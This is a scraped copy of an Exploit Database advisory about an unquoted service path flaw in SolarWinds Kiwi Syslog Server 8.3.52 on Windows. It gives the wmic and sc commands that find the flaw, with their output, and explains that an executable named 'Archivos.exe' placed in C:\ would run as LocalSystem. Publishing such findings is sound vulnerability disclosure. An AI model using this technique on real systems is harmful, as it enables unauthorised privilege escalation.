SolarWinds Kiwi Syslog Server 8.3.52 – ‘Kiwi Syslog Server’ Unquoted Service Path

• Exploit Database
• 114 阅读

• 作者： Carlos A Garcia R
  日期： 2019-11-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47599/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

  # Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path # Date: 2019-11-08 # Exploit Author: Carlos A Garcia R # Vendor Homepage: https://www.kiwisyslog.com/ # Software Link: https://www.kiwisyslog.com/downloads # Version: 8.3.52 # Tested on: Windows XP Professional Service Pack 3   # Description: # SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs   # PoC:   # C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """   Kiwi Syslog Server Kiwi Syslog Server C:\Archivos de programa\Syslogd\Syslogd_Service.exe Auto   # C:\>sc qc "Kiwi Syslog Server" [SC] GetServiceConfig SUCCESS   SERVICE_NAME: Kiwi Syslog Server TYPE : 10WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL: 1 NORMAL BINARY_PATH_NAME : C:\Archivos de programa\Syslogd\Syslogd_Service.exe LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : Kiwi Syslog Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem   # Exploit Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" could be placed in "C:\", and it would be executed as the Local System user next time the service was restarted.